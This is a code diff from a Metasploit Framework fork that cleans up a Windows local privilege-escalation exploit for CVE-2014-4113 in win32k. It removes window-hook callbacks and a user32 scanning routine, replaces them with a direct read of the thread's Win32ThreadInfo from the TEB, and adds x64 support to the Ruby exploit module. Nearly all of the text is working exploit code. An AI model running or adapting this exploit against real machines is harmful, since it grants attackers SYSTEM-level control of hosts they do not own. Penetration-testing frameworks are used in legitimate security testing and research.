Land zeroSteiner/metasploit-framework#9 clean up
This commit is contained in:
commit
2d76a8da4a
Binary file not shown.
Binary file not shown.
|
@ -23,7 +23,6 @@ typedef QWORD *PQWORD;
|
|||
|
||||
int WndProcClue = 0;
|
||||
int HookCallbackClue = 0;
|
||||
int HookCallbackThreeClue = 0;
|
||||
WNDPROC lpPrevWndFunc;
|
||||
DWORD MyProcessId = 0;
|
||||
DWORD OffsetWindows = 0;
|
||||
|
@ -71,49 +70,12 @@ typedef struct _SYSTEM_MODULE_INFORMATION {
|
|||
lPsLookupProcessByProcessId pPsLookupProcessByProcessId = NULL;
|
||||
lNtAllocateVirtualMemory pNtAllocateVirtualMemory = NULL;
|
||||
|
||||
LRESULT __stdcall HookCallbackThree(int code, WPARAM wParam, LPARAM lParam)
|
||||
{
|
||||
if (wParam == 4 && *(DWORD *)lParam == GetCurrentThreadId() && *(DWORD *)(lParam + 12) == 0x900516)
|
||||
HookCallbackThreeClue = 1;
|
||||
return CallNextHookEx(0, code, wParam, lParam);
|
||||
}
|
||||
|
||||
#ifdef _M_X64
|
||||
long CALLBACK HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
|
||||
{
|
||||
EndMenu();
|
||||
return -5;
|
||||
}
|
||||
#else
|
||||
LRESULT __stdcall HookCallbackTwo(HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam)
|
||||
{
|
||||
LRESULT result;
|
||||
DWORD v5;
|
||||
|
||||
if (Msg == 0x1EB)
|
||||
{
|
||||
v5 = GetCurrentThreadId();
|
||||
SetWindowsHookExA(9, HookCallbackThree, 0, v5);
|
||||
SendMessageA(hWnd, 0, 0x900516u, 0);
|
||||
UnhookWindowsHook(9, HookCallbackThree);
|
||||
if (HookCallbackThreeClue)
|
||||
{
|
||||
EndMenu();
|
||||
result = CallWindowProcA(lpPrevWndFunc, hWnd, 0x1EBu, wParam, lParam);
|
||||
}
|
||||
else
|
||||
{
|
||||
EndMenu();
|
||||
result = -5;
|
||||
}
|
||||
}
|
||||
else
|
||||
{
|
||||
result = CallWindowProcA(lpPrevWndFunc, hWnd, Msg, wParam, lParam);
|
||||
}
|
||||
return result;
|
||||
}
|
||||
#endif
|
||||
|
||||
LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam) {
|
||||
#ifdef _M_X64
|
||||
|
@ -146,47 +108,10 @@ LRESULT CALLBACK WndProc(HWND hwnd, UINT msg, WPARAM wParam, LPARAM lParam) {
|
|||
|
||||
#ifdef _M_X64
|
||||
QWORD MyPtiCurrent(void) {
|
||||
struct _IMAGE_DOS_HEADER *hUser32;
|
||||
PIMAGE_DOS_HEADER dosHeader;
|
||||
FARPROC tmpProcAddress;
|
||||
PIMAGE_NT_HEADERS ntHeader;
|
||||
QWORD imageBase;
|
||||
BYTE currentByte;
|
||||
QWORD sizeOfImage;
|
||||
int counter;
|
||||
PIMAGE_DOS_HEADER(*v8)(void);
|
||||
PIMAGE_DOS_HEADER *v10;
|
||||
void *teb = (void *)__readgsqword(0x30);
|
||||
QWORD Win32ThreadInfo = (QWORD)*((PQWORD)((PBYTE)teb + 0x78));
|
||||
|
||||
v10 = 0;
|
||||
hUser32 = LoadLibraryA("user32.dll");
|
||||
dosHeader = hUser32;
|
||||
if (hUser32) {
|
||||
tmpProcAddress = GetProcAddress(hUser32, "AnimateWindow");
|
||||
if (tmpProcAddress && dosHeader->e_magic == 'ZM') {
|
||||
ntHeader = (PIMAGE_NT_HEADERS)((BYTE *)dosHeader + dosHeader->e_lfanew);
|
||||
imageBase = ntHeader->OptionalHeader.ImageBase;
|
||||
currentByte = *(BYTE *)tmpProcAddress;
|
||||
sizeOfImage = imageBase + ntHeader->OptionalHeader.SizeOfImage;
|
||||
counter = 0;
|
||||
do {
|
||||
if (currentByte == 0xe8) {
|
||||
v8 = (FARPROC)((char *)tmpProcAddress);
|
||||
v8 = (FARPROC)((QWORD)v8 + counter);
|
||||
v8 = (FARPROC)((DWORD)v8 + *(DWORD *)((char *)tmpProcAddress + counter + 1));
|
||||
v8 = (FARPROC)((QWORD)v8 + 5);
|
||||
if (((QWORD)v8 >= imageBase) && ((QWORD)v8 <= sizeOfImage)) {
|
||||
v10 = (PIMAGE_DOS_HEADER *)v8();
|
||||
break;
|
||||
}
|
||||
}
|
||||
counter++;
|
||||
currentByte = *((BYTE *)tmpProcAddress + counter);
|
||||
} while (counter <= 70);
|
||||
}
|
||||
FreeLibrary(dosHeader);
|
||||
dosHeader = (PIMAGE_DOS_HEADER)v10;
|
||||
}
|
||||
return (QWORD)dosHeader;
|
||||
return Win32ThreadInfo;
|
||||
}
|
||||
#else
|
||||
DWORD __stdcall MyPtiCurrent() {
|
||||
|
|
|
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
'juan vazquez', # msf module (x86 target)
|
||||
'Spencer McIntyre' # msf module (x64 target)
|
||||
],
|
||||
'Arch' => ARCH_X86,
|
||||
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
|
||||
'Platform' => 'win',
|
||||
'SessionTypes' => [ 'meterpreter' ],
|
||||
'DefaultOptions' =>
|
||||
|
@ -113,6 +113,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
else
|
||||
dll_file_name = 'cve-2014-4113.x64.dll'
|
||||
end
|
||||
|
||||
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4113', dll_file_name)
|
||||
library_path = ::File.expand_path(library_path)
|
||||
|
||||
|
|
Loading…
Reference in New Issue